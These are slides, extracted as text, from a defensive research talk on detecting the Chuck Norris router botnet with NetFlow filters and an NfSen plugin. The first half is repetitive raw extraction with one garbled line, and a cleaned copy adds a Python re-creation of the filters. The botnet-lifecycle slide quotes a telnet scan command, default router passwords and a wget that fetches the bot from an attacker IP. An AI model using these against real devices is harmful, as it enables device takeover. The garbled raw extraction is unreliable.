Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 10 28
More about Chuck Norris Botnet
Chuck Norris botnet lifecycle in details and furtherinformation are available at the CYBER project page
httpwwwmuniczicscyberchuck_norris_botnet
3 wget scan-tools
webserver
2 Topic init-cmd (get scan-tools)
1 join soldiersCampC(IRC)serverSTOP
bot
stop remote access(ports 22-80)
infecteddevice
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 11 28
Part III
Botnet Detection Methods
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 12 28
Detection Methods Overview
Five Detection Methods
Telnet scan detectionConnections to botnet distribution sites detectionConnections to botnet CampC centers detectionDNS spoofing attack detectionADSL string detection
Methods Correspond to Botnet Lifecycle
Applied to NetFlow Data
Defined as NFDUMP filtersImplemented to NfSen collector
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 13 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
NFDUMP detection filter
(net local_network) and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
NFDUMP detection filter(net local_network)
and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
NFDUMP detection filter(net local_network)
and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP)
and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
1961428x
2141283x
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP)
and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
1961428x
2141283x
SYNRESET flags
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP) and
((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
NFDUMP detection filter(src net local_network) and (dst ip web_servers1)
and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP)
and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2)
and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP)
and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
NFDUMP detection filter
(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or
(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4))
and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
UDP53
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
ADSL String Detection
Looking for ADSL String
ADSL string indicates Chuck Norris botnetSearching in victimrsquos hostname or victimrsquos WHOISQuering DNS server and parsing recieved hostnameQuering WHOIS database and parsing recieved info
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 18 28
+
13131313
$amp()+--amp130+(amp0(131$2 13133+13133++ampamp45(331+605+70138913$13+-
amp3133+913($2-+(-amp3 lt$$2 2=gtlt$$21313913$+7013+-
1313130 $ 0$1
adsl
196192572
Detected Chuck Norris Servers
Known IP Addresses
Web server addresses 8798173190 879816386IRC server addresses 8798173190 879816386IRC server port 12000OpenDNS server addresses 2086722222220867220220Spoofed DNS server 879816386
This data is used in detection methods by default
IP addresses updates are published at project page
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 19 28
Part IV
NfSen Botnet Detection Plugin
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 20 28
Botnet Detection Plugin
Plugin Features
Detects Chuck Norris-like botnet behaviorBased on NetFlow and other network data sourcesProcesses data regularly and provides real-time output
Plugin Architecture
Compliant with NfSen plugins architecture recommendationsPHP frontend with a Perl backend and a PostgreSQL DBWeb e-mail and syslog detection output and reporting
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 21 28
Plugin Architecture
BACKEND FRONTEND
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
NetFlow Monitoring at Masaryk University
FlowMon
probe
FlowMon
probe
FlowMon
probe
NetFlowdata
generation
NetFlow
collector
NetFlow
v5v9
NetFlowdata
collection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 6 28
NetFlow Monitoring at Masaryk University
FlowMon
probe
FlowMon
probe
FlowMon
probe
NetFlowdata
generation
NetFlow
collector
NetFlow
v5v9
NetFlowdata
collection
NetFlowdata
analyses
SPAM
detection
wormvirus
detection
intrusion
detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 6 28
NetFlow Monitoring at Masaryk University
FlowMon
probe
FlowMon
probe
FlowMon
probe
NetFlowdata
generation
NetFlow
collector
NetFlow
v5v9
NetFlowdata
collection
NetFlowdata
analyses
SPAM
detection
wormvirus
detection
intrusion
detection
http
syslog
incident
reporting
mailbox
WWW
syslog
server
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 6 28
From NetFlow Monitoring to Botnet Discovery
Network Behaviour Analysis at MU
Identifies malware from NetFlow dataWatch whatrsquos happening inside the network 247Single purpose detection patterns (scanning botnets )Complex models of the network behavior
Even Chuck Norris Canrsquot Resist NetFlow Monitoring
Unusual worldwide TELNET scan attemptsMostly comming from ADSL connectionsNew botnet Chuck Norris discovered at December 2009Detailed analysis followed
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 7 28
Part II
Chuck Norris Botnet in a Nutshell
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 8 28
Chuck Norris Botnet
Linux malware ndash IRC bots with central CampC serversAttacks poorly-configured Linux MIPSEL devicesVulnerable devices ndash ADSL modems and routers
Uses TELNET brute force attack for infectionUsers are not aware about the malicious activitiesMissing anti-malware solution to detect it
Discovered at Masaryk University on 2 December 2009 The malware got the ChuckNorris moniker from a comment in its source code [R]anger Killato in nomedi Chuck Norris
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 9 28
Botnet Lifecycle
Scanning for vulnerable devices in predefined networksIP prefixes of ADSL networks of worldwide operatorsnetwork scanning ndash pnscan -n30 88102106024 23
Infection of a vulnerable deviceTELNET dictionary attack ndash 15 default passwordsadmin password root 1234 dreambox blank password
IRC bot initializationIRC bot download and execution on infected device wget http879816386pwnsyslgd
Botnet CampC operationsfurther bots spreading and CampC commands executionDNS spoofing and denial-of-service attacks
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 10 28
More about Chuck Norris Botnet
Chuck Norris botnet lifecycle in details and furtherinformation are available at the CYBER project page
httpwwwmuniczicscyberchuck_norris_botnet
3 wget scan-tools
webserver
2 Topic init-cmd (get scan-tools)
1 join soldiersCampC(IRC)serverSTOP
bot
stop remote access(ports 22-80)
infecteddevice
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 11 28
Part III
Botnet Detection Methods
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 12 28
Detection Methods Overview
Five Detection Methods
Telnet scan detectionConnections to botnet distribution sites detectionConnections to botnet CampC centers detectionDNS spoofing attack detectionADSL string detection
Methods Correspond to Botnet Lifecycle
Applied to NetFlow Data
Defined as NFDUMP filtersImplemented to NfSen collector
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 13 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
NFDUMP detection filter
(net local_network) and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
NFDUMP detection filter(net local_network)
and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
NFDUMP detection filter(net local_network)
and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP)
and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
1961428x
2141283x
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP)
and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
1961428x
2141283x
SYNRESET flags
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP) and
((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
NFDUMP detection filter(src net local_network) and (dst ip web_servers1)
and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP)
and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet C&C Center – Phase III
Bot's IRC traffic with the command and control center
[Figure: infected device in the local network connecting to the botnet C&C server, TCP/1200, SYN+ACK flags]
NFDUMP detection filter:
(src net local_network) and (dst ip IRC_server²) and (dst port 1200) and (proto TCP) and (flags SA and not flag R)
² IP address of the attacker's IRC server (botnet C&C center)
DNS Spoofing Attack Detection – Phase IV
Attacker's DNS or OpenDNS Queries
Common DNS requests forwarded to OpenDNS servers
Targeted DNS requests forwarded to the attacker's spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
E.g. Facebook or banking sites
[Figure: infected device in the local network sending UDP/53 queries to an OpenDNS server and to the spoofed DNS server]
NFDUMP detection filter:
(src net local_network) and ((dst ip OpenDNS_servers³) or (dst ip DNS_servers⁴)) and (proto UDP) and (dst port 53)
³ IP addresses of the common OpenDNS servers
⁴ IP addresses of the attacker's spoofed DNS servers
ADSL String Detection
Looking for the ADSL String
ADSL string indicates the Chuck Norris botnet
Searching in the victim's hostname or the victim's WHOIS record
Querying the DNS server and parsing the received hostname
Querying the WHOIS database and parsing the received info
[Figure: screenshot of a lookup result containing the "adsl" string]
Detected Chuck Norris Servers
Known IP Addresses
Web server addresses: 87.98.173.190, 87.98.163.86
IRC server addresses: 87.98.173.190, 87.98.163.86
IRC server port: 12000
OpenDNS server addresses: 208.67.222.222, 208.67.220.220
Spoofed DNS server: 87.98.163.86
This data is used in the detection methods by default
IP address updates are published on the project page
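The four NFDUMP filters from Phases I to IV and the ADSL string check, re-created in Python over constructed flow records so the matching logic can be run offline. This is an added example, not the authors' NfSen plugin code; the local prefix 192.0.2.0/24, the sample flows and the reverse-DNS answers are constructed, while the server addresses are the defaults listed on this slide.

```python
"""Chuck Norris detection methods re-created over NetFlow-like records (added example)."""
import ipaddress
from dataclasses import dataclass
from typing import Dict, Iterable, List, Set

# Server list from the "Detected Chuck Norris Servers" slide (the plugin's defaults).
DISTRIBUTION_WEB_SERVERS = {"87.98.173.190", "87.98.163.86"}
IRC_SERVERS = {"87.98.173.190", "87.98.163.86"}
IRC_PORT = 1200  # port in the Phase III filter; the server slide lists 12000, so keep it a parameter
OPENDNS_SERVERS = {"208.67.222.222", "208.67.220.220"}
SPOOFED_DNS_SERVERS = {"87.98.163.86"}
# Constructed placeholder for the deck's local_network (TEST-NET-1, not a real campus prefix).
LOCAL_NETWORK = ipaddress.ip_network("192.0.2.0/24")


@dataclass(frozen=True)
class Flow:
    """One unidirectional flow record; flags are cumulative TCP flags in nfdump letters (A S F R P U)."""
    src: str
    dst: str
    proto: str  # "TCP" or "UDP"
    dport: int
    flags: str = ""


def _local(ip: str) -> bool:
    return ipaddress.ip_address(ip) in LOCAL_NETWORK

def _flags_set(f: Flow, letters: str) -> bool:
    """nfdump 'flags XYZ': every listed flag is set."""
    return all(c in f.flags for c in letters)

def _flags_clear(f: Flow, letters: str) -> bool:
    """nfdump 'not flags XYZ': none of the listed flags is set."""
    return not any(c in f.flags for c in letters)

def telnet_scan(f: Flow) -> bool:
    """Phase I: (net local_network) and (dst port 23) and (proto TCP) and
    ((flags S and not flags ARPUF) or (flags SR and not flags APUF)).
    Plain 'net' matches the prefix on either side, so incoming and outgoing probes both count."""
    return ((_local(f.src) or _local(f.dst)) and f.dport == 23 and f.proto == "TCP"
            and ((_flags_set(f, "S") and _flags_clear(f, "ARPUF"))
                 or (_flags_set(f, "SR") and _flags_clear(f, "APUF"))))

def distribution_site(f: Flow) -> bool:
    """Phase II: (src net local_network) and (dst ip web_servers) and (dst port 80)
    and (proto TCP) and (flags SA and not flag R): a completed, non-reset download."""
    return (_local(f.src) and f.dst in DISTRIBUTION_WEB_SERVERS and f.dport == 80
            and f.proto == "TCP" and _flags_set(f, "SA") and _flags_clear(f, "R"))

def cc_connection(f: Flow) -> bool:
    """Phase III: the Phase II shape applied to the IRC C&C server and port."""
    return (_local(f.src) and f.dst in IRC_SERVERS and f.dport == IRC_PORT
            and f.proto == "TCP" and _flags_set(f, "SA") and _flags_clear(f, "R"))

def dns_spoofing(f: Flow) -> bool:
    """Phase IV: (src net local_network) and ((dst ip OpenDNS) or (dst ip spoofed DNS))
    and (proto UDP) and (dst port 53)."""
    return (_local(f.src) and (f.dst in OPENDNS_SERVERS or f.dst in SPOOFED_DNS_SERVERS)
            and f.proto == "UDP" and f.dport == 53)

def adsl_string(hostname: str, whois_text: str = "") -> bool:
    """ADSL string detection: 'adsl' in the victim's reverse-DNS hostname or WHOIS record."""
    return "adsl" in hostname.lower() or "adsl" in whois_text.lower()

def run_detection(flows: Iterable[Flow], hostnames: Dict[str, str]) -> Dict[str, List[str]]:
    """Run the four flow filters, then the ADSL check on every host they flagged.
    hostnames stands in for the plugin's reverse-DNS lookups so the example runs offline."""
    names = ("telnet_scan", "distribution_site", "cc_connection", "dns_spoofing")
    hits: Dict[str, Set[str]] = {n: set() for n in names + ("adsl_string",)}
    for f in flows:
        for name, check in zip(names, (telnet_scan, distribution_site, cc_connection, dns_spoofing)):
            if check(f):
                hits[name].add(f.src)  # flow source: a local bot, or the remote scanner in Phase I
    for ip in set().union(*hits.values()):
        if adsl_string(hostnames.get(ip, "")):
            hits["adsl_string"].add(ip)
    return {name: sorted(ips) for name, ips in hits.items()}


# Constructed sample records: an infected local device (192.0.2.10), a remote scanner, benign traffic.
SAMPLE_FLOWS = [
    Flow("192.0.2.10", "203.0.113.5", "TCP", 23, "S"),             # outgoing SYN-only telnet probe
    Flow("198.51.100.7", "192.0.2.20", "TCP", 23, "SR"),           # incoming probe answered by RST
    Flow("192.0.2.10", "203.0.113.6", "TCP", 23, "SAPF"),          # full telnet session, not a scan
    Flow("192.0.2.10", "87.98.163.86", "TCP", 80, "SAPF"),         # bot binary download
    Flow("192.0.2.10", "87.98.173.190", "TCP", IRC_PORT, "SAP"),   # IRC C&C session
    Flow("192.0.2.30", "87.98.173.190", "TCP", IRC_PORT, "SR"),    # refused connection, ignored
    Flow("192.0.2.10", "208.67.222.222", "UDP", 53),               # DNS redirected to OpenDNS
    Flow("192.0.2.30", "198.51.100.53", "UDP", 53),                # DNS to an unrelated resolver
]
SAMPLE_HOSTNAMES = {"192.0.2.10": "192-0-2-10.adsl.example.net", "198.51.100.7": "host7.example.org"}

if __name__ == "__main__":
    for method, hosts in run_detection(SAMPLE_FLOWS, SAMPLE_HOSTNAMES).items():
        print(f"{method:18s} {', '.join(hosts) or '-'}")
```

Only 192.0.2.10 trips all five methods; the remote scanner is caught by Phase I alone, and the reset C&C attempt and the ordinary telnet session are correctly ignored.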
Part IV
NfSen Botnet Detection Plugin
Botnet Detection Plugin
Plugin Features
Detects Chuck Norris-like botnet behavior
Based on NetFlow and other network data sources
Processes data regularly and provides real-time output
Plugin Architecture
Compliant with NfSen plugin architecture recommendations
PHP frontend with a Perl backend and a PostgreSQL DB
Web, e-mail and syslog detection output and reporting
Plugin Architecture
[Figure: BACKEND: cndet.pm and cndetdb.pm with a PostgreSQL database, fed by NetFlow data, DNS and the WHOIS db, talking to the FRONTEND (cndet.php) over the nfsend communication interface]
Plugin Methods Architecture
[Figure: cndetdb.pm with PostgreSQL, fed by NetFlow data, DNS and the WHOIS db, driving the five detection methods]
Telnet scan detection
Botnet distribution sites detection
Botnet C&C centers detection
DNS spoofing attack detection
ADSL string detection
Web Interface – Infected Host Detected
